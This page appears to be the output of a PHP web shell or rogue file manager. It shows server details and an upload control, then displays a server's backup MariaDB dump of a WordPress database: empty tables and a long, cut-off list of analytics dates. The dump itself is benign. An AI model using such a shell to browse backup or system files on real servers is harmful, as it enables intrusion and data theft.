HEX
Server: Apache/2.4.58 (Ubuntu)
System: Linux host 6.8.0-107-generic #107-Ubuntu SMP PREEMPT_DYNAMIC Fri Mar 13 19:51:50 UTC 2026 x86_64
User: w230 (1248)
PHP: 8.3.6
Disabled: NONE
Upload Files
File: //proc/self/root/backup/w037.sql
/*M!999999\- enable the sandbox mode */ 
-- MariaDB dump 10.19  Distrib 10.11.14-MariaDB, for debian-linux-gnu (x86_64)
--
-- Host: localhost    Database: w037
-- ------------------------------------------------------
-- Server version	10.11.14-MariaDB-0ubuntu0.24.04.1

/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
/*!40101 SET NAMES utf8mb4 */;
/*!40103 SET @OLD_TIME_ZONE=@@TIME_ZONE */;
/*!40103 SET TIME_ZONE='+00:00' */;
/*!40014 SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0 */;
/*!40014 SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0 */;
/*!40101 SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='NO_AUTO_VALUE_ON_ZERO' */;
/*!40111 SET @OLD_SQL_NOTES=@@SQL_NOTES, SQL_NOTES=0 */;

--
-- Table structure for table `wp_commentmeta`
--

DROP TABLE IF EXISTS `wp_commentmeta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_commentmeta` (
  `meta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `comment_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `meta_key` varchar(255) DEFAULT NULL,
  `meta_value` longtext DEFAULT NULL,
  PRIMARY KEY (`meta_id`),
  KEY `comment_id` (`comment_id`),
  KEY `meta_key` (`meta_key`(191))
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_commentmeta`
--

LOCK TABLES `wp_commentmeta` WRITE;
/*!40000 ALTER TABLE `wp_commentmeta` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_commentmeta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_comments`
--

DROP TABLE IF EXISTS `wp_comments`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_comments` (
  `comment_ID` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `comment_post_ID` bigint(20) unsigned NOT NULL DEFAULT 0,
  `comment_author` tinytext NOT NULL,
  `comment_author_email` varchar(100) NOT NULL DEFAULT '',
  `comment_author_url` varchar(200) NOT NULL DEFAULT '',
  `comment_author_IP` varchar(100) NOT NULL DEFAULT '',
  `comment_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `comment_date_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `comment_content` text NOT NULL,
  `comment_karma` int(11) NOT NULL DEFAULT 0,
  `comment_approved` varchar(20) NOT NULL DEFAULT '1',
  `comment_agent` varchar(255) NOT NULL DEFAULT '',
  `comment_type` varchar(20) NOT NULL DEFAULT 'comment',
  `comment_parent` bigint(20) unsigned NOT NULL DEFAULT 0,
  `user_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  PRIMARY KEY (`comment_ID`),
  KEY `comment_post_ID` (`comment_post_ID`),
  KEY `comment_approved_date_gmt` (`comment_approved`,`comment_date_gmt`),
  KEY `comment_date_gmt` (`comment_date_gmt`),
  KEY `comment_parent` (`comment_parent`),
  KEY `comment_author_email` (`comment_author_email`(10))
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_comments`
--

LOCK TABLES `wp_comments` WRITE;
/*!40000 ALTER TABLE `wp_comments` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_comments` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_kbp_form_entry`
--

DROP TABLE IF EXISTS `wp_kbp_form_entry`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_kbp_form_entry` (
  `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `name` varchar(255) DEFAULT NULL,
  `form_id` varchar(55) DEFAULT NULL,
  `post_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `user_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `date_created` datetime NOT NULL,
  `user_ip` int(11) unsigned NOT NULL DEFAULT 0,
  `user_device` varchar(55) DEFAULT NULL,
  `referer` varchar(255) DEFAULT NULL,
  `status` varchar(10) DEFAULT 'publish',
  `uuid` varchar(100) NOT NULL DEFAULT '',
  PRIMARY KEY (`id`),
  KEY `post_id` (`post_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_kbp_form_entry`
--

LOCK TABLES `wp_kbp_form_entry` WRITE;
/*!40000 ALTER TABLE `wp_kbp_form_entry` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_kbp_form_entry` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_kbp_form_entrymeta`
--

DROP TABLE IF EXISTS `wp_kbp_form_entrymeta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_kbp_form_entrymeta` (
  `meta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `kbp_form_entry_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `meta_key` varchar(255) DEFAULT NULL,
  `meta_value` longtext DEFAULT NULL,
  PRIMARY KEY (`meta_id`),
  KEY `entry_id` (`kbp_form_entry_id`),
  KEY `meta_key` (`meta_key`(191))
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_kbp_form_entrymeta`
--

LOCK TABLES `wp_kbp_form_entrymeta` WRITE;
/*!40000 ALTER TABLE `wp_kbp_form_entrymeta` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_kbp_form_entrymeta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_koko_analytics_dates`
--

DROP TABLE IF EXISTS `wp_koko_analytics_dates`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_koko_analytics_dates` (
  `date` date NOT NULL,
  PRIMARY KEY (`date`)
) ENGINE=InnoDB DEFAULT CHARSET=ascii COLLATE=ascii_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_koko_analytics_dates`
--

LOCK TABLES `wp_koko_analytics_dates` WRITE;
/*!40000 ALTER TABLE `wp_koko_analytics_dates` DISABLE KEYS */;
INSERT INTO `wp_koko_analytics_dates` VALUES
('2000-01-01'),
('2000-01-02'),
('2000-01-03'),
('2000-01-04'),
('2000-01-05'),
('2000-01-06'),
('2000-01-07'),
('2000-01-08'),
('2000-01-09'),
('2000-01-10'),
('2000-01-11'),
('2000-01-12'),
('2000-01-13'),
('2000-01-14'),
('2000-01-15'),
('2000-01-16'),
('2000-01-17'),
('2000-01-18'),
('2000-01-19'),
('2000-01-20'),
('2000-01-21'),
('2000-01-22'),
('2000-01-23'),
('2000-01-24'),
('2000-01-25'),
('2000-01-26'),
('2000-01-27'),
('2000-01-28'),
('2000-01-29'),
('2000-01-30'),
('2000-01-31'),
('2000-02-01'),
('2000-02-02'),
('2000-02-03'),
('2000-02-04'),
('2000-02-05'),
('2000-02-06'),
('2000-02-07'),
('2000-02-08'),
('2000-02-09'),
('2000-02-10'),
('2000-02-11'),
('2000-02-12'),
('2000-02-13'),
('2000-02-14'),
('2000-02-15'),
('2000-02-16'),
('2000-02-17'),
('2000-02-18'),
('2000-02-19'),
('2000-02-20'),
('2000-02-21'),
('2000-02-22'),
('2000-02-23'),
('2000-02-24'),
('2000-02-25'),
('2000-02-26'),
('2000-02-27'),
('2000-02-28'),
('2000-02-29'),
('2000-03-01'),
('2000-03-02'),
('2000-03-03'),
('2000-03-04'),
('2000-03-05'),
('2000-03-06'),
('2000-03-07'),
('2000-03-08'),
('2000-03-09'),
('2000-03-10'),
('2000-03-11'),
('2000-03-12'),
('2000-03-13'),
('2000-03-14'),
('2000-03-15'),
('2000-03-16'),
('2000-03-17'),
('2000-03-18'),
('2000-03-19'),
('2000-03-20'),
('2000-03-21'),
('2000-03-22'),
('2000-03-23'),
('2000-03-24'),
('2000-03-25'),
('2000-03-26'),
('2000-03-27'),
('2000-03-28'),
('2000-03-29'),
('2000-03-30'),
('2000-03-31'),
('2000-04-01'),
('2000-04-02'),
('2000-04-03'),
('2000-04-04'),
('2000-04-05'),
('2000-04-06'),
('2000-04-07'),
('2000-04-08'),
('2000-04-09'),
('2000-04-10'),
('2000-04-11'),
('2000-04-12'),
('2000-04-13'),
('2000-04-14'),
('2000-04-15'),
('2000-04-16'),
('2000-04-17'),
('2000-04-18'),
('2000-04-19'),
('2000-04-20'),
('2000-04-21'),
('2000-04-22'),
('2000-04-23'),
('2000-04-24'),
('2000-04-25'),
('2000-04-26'),
('2000-04-27'),
('2000-04-28'),
('2000-04-29'),
('2000-04-30'),
('2000-05-01'),
('2000-05-02'),
('2000-05-03'),
('2000-05-04'),
('2000-05-05'),
('2000-05-06'),
('2000-05-07'),
('2000-05-08'),
('2000-05-09'),
('2000-05-10'),
('2000-05-11'),
('2000-05-12'),
('2000-05-13'),
('2000-05-14'),
('2000-05-15'),
('2000-05-16'),
('2000-05-17'),
('2000-05-18'),
('2000-05-19'),
('2000-05-20'),
('2000-05-21'),
('2000-05-22'),
('2000-05-23'),
('2000-05-24'),
('2000-05-25'),
('2000-05-26'),
('2000-05-27'),
('2000-05-28'),
('2000-05-29'),
('2000-05-30'),
('2000-05-31'),
('2000-06-01'),
('2000-06-02'),
('2000-06-03'),
('2000-06-04'),
('2000-06-05'),
('2000-06-06'),
('2000-06-07'),
('2000-06-08'),
('2000-06-09'),
('2000-06-10'),
('2000-06-11'),
('2000-06-12'),
('2000-06-13'),
('2000-06-14'),
('2000-06-15'),
('2000-06-16'),
('2000-06-17'),
('2000-06-18'),
('2000-06-19'),
('2000-06-20'),
('2000-06-21'),
('2000-06-22'),
('2000-06-23'),
('2000-06-24'),
('2000-06-25'),
('2000-06-26'),
('2000-06-27'),
('2000-06-28'),
('2000-06-29'),
('2000-06-30'),
('2000-07-01'),
('2000-07-02'),
('2000-07-03'),
('2000-07-04'),
('2000-07-05'),
('2000-07-06'),
('2000-07-07'),
('2000-07-08'),
('2000-07-09'),
('2000-07-10'),
('2000-07-11'),
('2000-07-12'),
('2000-07-13'),
('2000-07-14'),
('2000-07-15'),
('2000-07-16'),
('2000-07-17'),
('2000-07-18'),
('2000-07-19'),
('2000-07-20'),
('2000-07-21'),
('2000-07-22'),
('2000-07-23'),
('2000-07-24'),
('2000-07-25'),
('2000-07-26'),
('2000-07-27'),
('2000-07-28'),
('2000-07-29'),
('2000-07-30'),
('2000-07-31'),
('2000-08-01'),
('2000-08-02'),
('2000-08-03'),
('2000-08-04'),
('2000-08-05'),
('2000-08-06'),
('2000-08-07'),
('2000-08-08'),
('2000-08-09'),
('2000-08-10'),
('2000-08-11'),
('2000-08-12'),
('2000-08-13'),
('2000-08-14'),
('2000-08-15'),
('2000-08-16'),
('2000-08-17'),
('2000-08-18'),
('2000-08-19'),
('2000-08-20'),
('2000-08-21'),
('2000-08-22'),
('2000-08-23'),
('2000-08-24'),
('2000-08-25'),
('2000-08-26'),
('2000-08-27'),
('2000-08-28'),
('2000-08-29'),
('2000-08-30'),
('2000-08-31'),
('2000-09-01'),
('2000-09-02'),
('2000-09-03'),
('2000-09-04'),
('2000-09-05'),
('2000-09-06'),
('2000-09-07'),
('2000-09-08'),
('2000-09-09'),
('2000-09-10'),
('2000-09-11'),
('2000-09-12'),
('2000-09-13'),
('2000-09-14'),
('2000-09-15'),
('2000-09-16'),
('2000-09-17'),
('2000-09-18'),
('2000-09-19'),
('2000-09-20'),
('2000-09-21'),
('2000-09-22'),
('2000-09-23'),
('2000-09-24'),
('2000-09-25'),
('2000-09-26'),
('2000-09-27'),
('2000-09-28'),
('2000-09-29'),
('2000-09-30'),
('2000-10-01'),
('2000-10-02'),
('2000-10-03'),
('2000-10-04'),
('2000-10-05'),
('2000-10-06'),
('2000-10-07'),
('2000-10-08'),
('2000-10-09'),
('2000-10-10'),
('2000-10-11'),
('2000-10-12'),
('2000-10-13'),
('2000-10-14'),
('2000-10-15'),
('2000-10-16'),
('2000-10-17'),
('2000-10-18'),
('2000-10-19'),
('2000-10-20'),
('2000-10-21'),
('2000-10-22'),
('2000-10-23'),
('2000-10-24'),
('2000-10-25'),
('2000-10-26'),
('2000-10-27'),
('2000-10-28'),
('2000-10-29'),
('2000-10-30'),
('2000-10-31'),
('2000-11-01'),
('2000-11-02'),
('2000-11-03'),
('2000-11-04'),
('2000-11-05'),
('2000-11-06'),
('2000-11-07'),
('2000-11-08'),
('2000-11-09'),
('2000-11-10'),
('2000-11-11'),
('2000-11-12'),
('2000-11-13'),
('2000-11-14'),
('2000-11-15'),
('2000-11-16'),
('2000-11-17'),
('2000-11-18'),
('2000-11-19'),
('2000-11-20'),
('2000-11-21'),
('2000-11-22'),
('2000-11-23'),
('2000-11-24'),
('2000-11-25'),
('2000-11-26'),
('2000-11-27'),
('2000-11-28'),
('2000-11-29'),
('2000-11-30'),
('2000-12-01'),
('2000-12-02'),
('2000-12-03'),
('2000-12-04'),
('2000-12-05'),
('2000-12-06'),
('2000-12-07'),
('2000-12-08'),
('2000-12-09'),
('2000-12-10'),
('2000-12-11'),
('2000-12-12'),
('2000-12-13'),
('2000-12-14'),
('2000-12-15'),
('2000-12-16'),
('2000-12-17'),
('2000-12-18'),
('2000-12-19'),
('2000-12-20'),
('2000-12-21'),
('2000-12-22'),
('2000-12-23'),
('2000-12-24'),
('2000-12-25'),
('2000-12-26'),
('2000-12-27'),
('2000-12-28'),
('2000-12-29'),
('2000-12-30'),
('2000-12-31'),
('2001-01-01'),
('2001-01-02'),
('2001-01-03'),
('2001-01-04'),
('2001-01-05'),
('2001-01-06'),
('2001-01-07'),
('2001-01-08'),
('2001-01-09'),
('2001-01-10'),
('2001-01-11'),
('2001-01-12'),
('2001-01-13'),
('2001-01-14'),
('2001-01-15'),
('2001-01-16'),
('2001-01-17'),
('2001-01-18'),
('2001-01-19'),
('2001-01-20'),
('2001-01-21'),
('2001-01-22'),
('2001-01-23'),
('2001-01-24'),
('2001-01-25'),
('2001-01-26'),
('2001-01-27'),
('2001-01-28'),
('2001-01-29'),
('2001-01-30'),
('2001-01-31'),
('2001-02-01'),
('2001-02-02'),
('2001-02-03'),
('2001-02-04'),
('2001-02-05'),
('2001-02-06'),
('2001-02-07'),
('2001-02-08'),
('2001-02-09'),
('2001-02-10'),
('2001-02-11'),
('2001-02-12'),
('2001-02-13'),
('2001-02-14'),
('2001-02-15'),
('2001-02-16'),
('2001-02-17'),
('2001-02-18'),
('2001-02-19'),
('2001-02-20'),
('2001-02-21'),
('2001-02-22'),
('2001-02-23'),
('2001-02-24'),
('2001-02-25'),
('2001-02-26'),
('2001-02-27'),
('2001-02-28'),
('2001-03-01'),
('2001-03-02'),
('2001-03-03'),
('2001-03-04'),
('2001-03-05'),
('2001-03-06'),
('2001-03-07'),
('2001-03-08'),
('2001-03-09'),
('2001-03-10'),
('2001-03-11'),
('2001-03-12'),
('2001-03-13'),
('2001-03-14'),
('2001-03-15'),
('2001-03-16'),
('2001-03-17'),
('2001-03-18'),
('2001-03-19'),
('2001-03-20'),
('2001-03-21'),
('2001-03-22'),
('2001-03-23'),
('2001-03-24'),
('2001-03-25'),
('2001-03-26'),
('2001-03-27'),
('2001-03-28'),
('2001-03-29'),
('2001-03-30'),
('2001-03-31'),
('2001-04-01'),
('2001-04-02'),
('2001-04-03'),
('2001-04-04'),
('2001-04-05'),
('2001-04-06'),
('2001-04-07'),
('2001-04-08'),
('2001-04-09'),
('2001-04-10'),
('2001-04-11'),
('2001-04-12'),
('2001-04-13'),
('2001-04-14'),
('2001-04-15'),
('2001-04-16'),
('2001-04-17'),
('2001-04-18'),
('2001-04-19'),
('2001-04-20'),
('2001-04-21'),
('2001-04-22'),
('2001-04-23'),
('2001-04-24'),
('2001-04-25'),
('2001-04-26'),
('2001-04-27'),
('2001-04-28'),
('2001-04-29'),
('2001-04-30'),
('2001-05-01'),
('2001-05-02'),
('2001-05-03'),
('2001-05-04'),
('2001-05-05'),
('2001-05-06'),
('2001-05-07'),
('2001-05-08'),
('2001-05-09'),
('2001-05-10'),
('2001-05-11'),
('2001-05-12'),
('2001-05-13'),
('2001-05-14'),
('2001-05-15'),
('2001-05-16'),
('2001-05-17'),
('2001-05-18'),
('2001-05-19'),
('2001-05-20'),
('2001-05-21'),
('2001-05-22'),
('2001-05-23'),
('2001-05-24'),
('2001-05-25'),
('2001-05-26'),
('2001-05-27'),
('2001-05-28'),
('2001-05-29'),
('2001-05-30'),
('2001-05-31'),
('2001-06-01'),
('2001-06-02'),
('2001-06-03'),
('2001-06-04'),
('2001-06-05'),
('2001-06-06'),
('2001-06-07'),
('2001-06-08'),
('2001-06-09'),
('2001-06-10'),
('2001-06-11'),
('2001-06-12'),
('2001-06-13'),
('2001-06-14'),
('2001-06-15'),
('2001-06-16'),
('2001-06-17'),
('2001-06-18'),
('2001-06-19'),
('2001-06-20'),
('2001-06-21'),
('2001-06-22'),
('2001-06-23'),
('2001-06-24'),
('2001-06-25'),
('2001-06-26'),
('2001-06-27'),
('2001-06-28'),
('2001-06-29'),
('2001-06-30'),
('2001-07-01'),
('2001-07-02'),
('2001-07-03'),
('2001-07-04'),
('2001-07-05'),
('2001-07-06'),
('2001-07-07'),
('2001-07-08'),
('2001-07-09'),
('2001-07-10'),
('2001-07-11'),
('2001-07-12'),
('2001-07-13'),
('2001-07-14'),
('2001-07-15'),
('2001-07-16'),
('2001-07-17'),
('2001-07-18'),
('2001-07-19'),
('2001-07-20'),
('2001-07-21'),
('2001-07-22'),
('2001-07-23'),
('2001-07-24'),
('2001-07-25'),
('2001-07-26'),
('2001-07-27'),
('2001-07-28'),
('2001-07-29'),
('2001-07-30'),
('2001-07-31'),
('2001-08-01'),
('2001-08-02'),
('2001-08-03'),
('2001-08-04'),
('2001-08-05'),
('2001-08-06'),
('2001-08-07'),
('2001-08-08'),
('2001-08-09'),
('2001-08-10'),
('2001-08-11'),
('2001-08-12'),
('2001-08-13'),
('2001-08-14'),
('2001-08-15'),
('2001-08-16'),
('2001-08-17'),
('2001-08-18'),
('2001-08-19'),
('2001-08-20'),
('2001-08-21'),
('2001-08-22'),
('2001-08-23'),
('2001-08-24'),
('2001-08-25'),
('2001-08-26'),
('2001-08-27'),
('2001-08-28'),
('2001-08-29'),
('2001-08-30'),
('2001-08-31'),
('2001-09-01'),
('2001-09-02'),
('2001-09-03'),
('2001-09-04'),
('2001-09-05'),
('2001-09-06'),
('2001-09-07'),
('2001-09-08'),
('2001-09-09'),
('2001-09-10'),
('2001-09-11'),
('2001-09-12'),
('2001-09-13'),
('2001-09-14'),
('2001-09-15'),
('2001-09-16'),
('2001-09-17'),
('2001-09-18'),
('2001-09-19'),
('2001-09-20'),
('2001-09-21'),
('2001-09-22'),
('2001-09-23'),
('2001-09-24'),
('2001-09-25'),
('2001-09-26'),
('2001-09-27'),
('2001-09-28'),
('2001-09-29'),
('2001-09-30'),
('2001-10-01'),
('2001-10-02'),
('2001-10-03'),
('2001-10-04'),
('2001-10-05'),
('2001-10-06'),
('2001-10-07'),
('2001-10-08'),
('2001-10-09'),
('2001-10-10'),
('2001-10-11'),
('2001-10-12'),
('2001-10-13'),
('2001-10-14'),
('2001-10-15'),
('2001-10-16'),
('2001-10-17'),
('2001-10-18'),
('2001-10-19'),
('2001-10-20'),
('2001-10-21'),
('2001-10-22'),
('2001-10-23'),
('2001-10-24'),
('2001-10-25'),
('2001-10-26'),
('2001-10-27'),
('2001-10-28'),
('2001-10-29'),
('2001-10-30'),
('2001-10-31'),
('2001-11-01'),
('2001-11-02'),
('2001-11-03'),
('2001-11-04'),
('2001-11-05'),
('2001-11-06'),
('2001-11-07'),
('2001-11-08'),
('2001-11-09'),
('2001-11-10'),
('2001-11-11'),
('2001-11-12'),
('2001-11-13'),
('2001-11-14'),
('2001-11-15'),
('2001-11-16'),
('2001-11-17'),
('2001-11-18'),
('2001-11-19'),
('2001-11-20'),
('2001-11-21'),
('2001-11-22'),
('2001-11-23'),
('2001-11-24'),
('2001-11-25'),
('2001-11-26'),
('2001-11-27'),
('2001-11-28'),
('2001-11-29'),
('2001-11-30'),
('2001-12-01'),
('2001-12-02'),
('2001-12-03'),
('2001-12-04'),
('2001-12-05'),
('2001-12-06'),
('2001-12-07'),
('2001-12-08'),
('2001-12-09'),
('2001-12-10'),
('2001-12-11'),
('2001-12-12'),
('2001-12-13'),
('2001-12-14'),
('2001-12-15'),
('2001-12-16'),
('2001-12-17'),
('2001-12-18'),
('2001-12-19'),
('2001-12-20'),
('2001-12-21'),
('2001-12-22'),
('2001-12-23'),
('2001-12-24'),
('2001-12-25'),
('2001-12-26'),
('2001-12-27'),
('2001-12-28'),
('2001-12-29'),
('2001-12-30'),
('2001-12-31'),
('2002-01-01'),
('2002-01-02'),
('2002-01-03'),
('2002-01-04'),
('2002-01-05'),
('2002-01-06'),
('2002-01-07'),
('2002-01-08'),
('2002-01-09'),
('2002-01-10'),
('2002-01-11'),
('2002-01-12'),
('2002-01-13'),
('2002-01-14'),
('2002-01-15'),
('2002-01-16'),
('2002-01-17'),
('2002-01-18'),
('2002-01-19'),
('2002-01-20'),
('2002-01-21'),
('2002-01-22'),
('2002-01-23'),
('2002-01-24'),
('2002-01-25'),
('2002-01-26'),
('2002-01-27'),
('2002-01-28'),
('2002-01-29'),
('2002-01-30'),
('2002-01-31'),
('2002-02-01'),
('2002-02-02'),
('2002-02-03'),
('2002-02-04'),
('2002-02-05'),
('2002-02-06'),
('2002-02-07'),
('2002-02-08'),
('2002-02-09'),
('2002-02-10'),
('2002-02-11'),
('2002-02-12'),
('2002-02-13'),
('2002-02-14'),
('2002-02-15'),
('2002-02-16'),
('2002-02-17'),
('2002-02-18'),
('2002-02-19'),
('2002-02-20'),
('2002-02-21'),
('2002-02-22'),
('2002-02-23'),
('2002-02-24'),
('2002-02-25'),
('2002-02-26'),
('2002-02-27'),
('2002-02-28'),
('2002-03-01'),
('2002-03-02'),
('2002-03-03'),
('2002-03-04'),
('2002-03-05'),
('2002-03-06'),
('2002-03-07'),
('2002-03-08'),
('2002-03-09'),
('2002-03-10'),
('2002-03-11'),
('2002-03-12'),
('2002-03-13'),
('2002-03-14'),
('2002-03-15'),
('2002-03-16'),
('2002-03-17'),
('2002-03-18'),
('2002-03-19'),
('2002-03-20'),
('2002-03-21'),
('2002-03-22'),
('2002-03-23'),
('2002-03-24'),
('2002-03-25'),
('2002-03-26'),
('2002-03-27'),
('2002-03-28'),
('2002-03-29'),
('2002-03-30'),
('2002-03-31'),
('2002-04-01'),
('2002-04-02'),
('2002-04-03'),
('2002-04-04'),
('2002-04-05'),
('2002-04-06'),
('2002-04-07'),
('2002-04-08'),
('2002-04-09'),
('2002-04-10'),
('2002-04-11'),
('2002-04-12'),
('2002-04-13'),
('2002-04-14'),
('2002-04-15'),
('2002-04-16'),
('2002-04-17'),
('2002-04-18'),
('2002-04-19'),
('2002-04-20'),
('2002-04-21'),
('2002-04-22'),
('2002-04-23'),
('2002-04-24'),
('2002-04-25'),
('2002-04-26'),
('2002-04-27'),
('2002-04-28'),
('2002-04-29'),
('2002-04-30'),
('2002-05-01'),
('2002-05-02'),
('2002-05-03'),
('2002-05-04'),
('2002-05-05'),
('2002-05-06'),
('2002-05-07'),
('2002-05-08'),
('2002-05-09'),
('2002-05-10'),
('2002-05-11'),
('2002-05-12'),
('2002-05-13'),
('2002-05-14'),
('2002-05-15'),
('2002-05-16'),
('2002-05-17'),
('2002-05-18'),
('2002-05-19'),
('2002-05-20'),
('2002-05-21'),
('2002-05-22'),
('2002-05-23'),
('2002-05-24'),
('2002-05-25'),
('2002-05-26'),
('2002-05-27'),
('2002-05-28'),
('2002-05-29'),
('2002-05-30'),
('2002-05-31'),
('2002-06-01'),
('2002-06-02'),
('2002-06-03'),
('2002-06-04'),
('2002-06-05'),
('2002-06-06'),
('2002-06-07'),
('2002-06-08'),
('2002-06-09'),
('2002-06-10'),
('2002-06-11'),
('2002-06-12'),
('2002-06-13'),
('2002-06-14'),
('2002-06-15'),
('2002-06-16'),
('2002-06-17'),
('2002-06-18'),
('2002-06-19'),
('2002-06-20'),
('2002-06-21'),
('2002-06-22'),
('2002-06-23'),
('2002-06-24'),
('2002-06-25'),
('2002-06-26'),
('2002-06-27'),
('2002-06-28'),
('2002-06-29'),
('2002-06-30'),
('2002-07-01'),
('2002-07-02'),
('2002-07-03'),
('2002-07-04'),
('2002-07-05'),
('2002-07-06'),
('2002-07-07'),
('2002-07-08'),
('2002-07-09'),
('2002-07-10'),
('2002-07-11'),
('2002-07-12'),
('2002-07-13'),
('2002-07-14'),
('2002-07-15'),
('2002-07-16'),
('2002-07-17'),
('2002-07-18'),
('2002-07-19'),
('2002-07-20'),
('2002-07-21'),
('2002-07-22'),
('2002-07-23'),
('2002-07-24'),
('2002-07-25'),
('2002-07-26'),
('2002-07-27'),
('2002-07-28'),
('2002-07-29'),
('2002-07-30'),
('2002-07-31'),
('2002-08-01'),
('2002-08-02'),
('2002-08-03'),
('2002-08-04'),
('2002-08-05'),
('2002-08-06'),
('2002-08-07'),
('2002-08-08'),
('2002-08-09'),
('2002-08-10'),
('2002-08-11'),
('2002-08-12'),
('2002-08-13'),
('2002-08-14'),
('2002-08-15'),
('2002-08-16'),
('2002-08-17'),
('2002-08-18'),
('2002-08-19'),
('2002-08-20'),
('2002-08-21'),
('2002-08-22'),
('2002-08-23'),
('2002-08-24'),
('2002-08-25'),
('2002-08-26'),
('2002-08-27'),
('2002-08-28'),
('2002-08-29'),
('2002-08-30'),
('2002-08-31'),
('2002-09-01'),
('2002-09-02'),
('2002-09-03'),
('2002-09-04'),
('2002-09-05'),
('2002-09-06'),
('2002-09-07'),
('2002-09-08'),
('2002-09-09'),
('2002-09-10'),
('2002-09-11'),
('2002-09-12'),
('2002-09-13'),
('2002-09-14'),
('2002-09-15'),
('2002-09-16'),
('2002-09-17'),
('2002-09-18'),
('2002-09-19'),
('2002-09-20'),
('2002-09-21'),
('2002-09-22'),
('2002-09-23'),
('2002-09-24'),
('2002-09-25'),
('2002-09-26'),
('2002-09-27'),
('2002-09-28'),
('2002-09-29'),
('2002-09-30'),
('2002-10-01'),
('2002-10-02'),
('2002-10-03'),
('2002-10-04'),
('2002-10-05'),
('2002-10-06'),
('2002-10-07'),
('2002-10-08'),
('2002-10-09'),
('2002-10-10'),
('2002-10-11'),
('2002-10-12'),
('2002-10-13'),
('2002-10-14'),
('2002-10-15'),
('2002-10-16'),
('2002-10-17'),
('2002-10-18'),
('2002-10-19'),
('2002-10-20'),
('2002-10-21'),
('2002-10-22'),
('2002-10-23'),
('2002-10-24'),
('2002-10-25'),
('2002-10-26'),
('2002-10-27'),
('2002-10-28'),
('2002-10-29'),
('2002-10-30'),
('2002-10-31'),
('2002-11-01'),
('2002-11-02'),
('2002-11-03'),
('2002-11-04'),
('2002-11-05'),
('2002-11-06'),
('2002-11-07'),
('2002-11-08'),
('2002-11-09'),
('2002-11-10'),
('2002-11-11'),
('2002-11-12'),
('2002-11-13'),
('2002-11-14'),
('2002-11-15'),
('2002-11-16'),
('2002-11-17'),
('2002-11-18'),
('2002-11-19'),
('2002-11-20'),
('2002-11-21'),
('2002-11-22'),
('2002-11-23'),
('2002-11-24'),
('2002-11-25'),
('2002-11-26'),
('2002-11-27'),
('2002-11-28'),
('2002-11-29'),
('2002-11-30'),
('2002-12-01'),
('2002-12-02'),
('2002-12-03'),
('2002-12-04'),
('2002-12-05'),
('2002-12-06'),
('2002-12-07'),
('2002-12-08'),
('2002-12-09'),
('2002-12-10'),
('2002-12-11'),
('2002-12-12'),
('2002-12-13'),
('2002-12-14'),
('2002-12-15'),
('2002-12-16'),
('2002-12-17'),
('2002-12-18'),
('2002-12-19'),
('2002-12-20'),
('2002-12-21'),
('2002-12-22'),
('2002-12-23'),
('2002-12-24'),
('2002-12-25'),
('2002-12-26'),
('2002-12-27'),
('2002-12-28'),
('2002-12-29'),
('2002-12-30'),
('2002-12-31'),
('2003-01-01'),
('2003-01-02'),
('2003-01-03'),
('2003-01-04'),
('2003-01-05'),
('2003-01-06'),
('2003-01-07'),
('2003-01-08'),
('2003-01-09'),
('2003-01-10'),
('2003-01-11'),
('2003-01-12'),
('2003-01-13'),
('2003-01-14'),
('2003-01-15'),
('2003-01-16'),
('2003-01-17'),
('2003-01-18'),
('2003-01-19'),
('2003-01-20'),
('2003-01-21'),
('2003-01-22'),
('2003-01-23'),
('2003-01-24'),
('2003-01-25'),
('2003-01-26'),
('2003-01-27'),
('2003-01-28'),
('2003-01-29'),
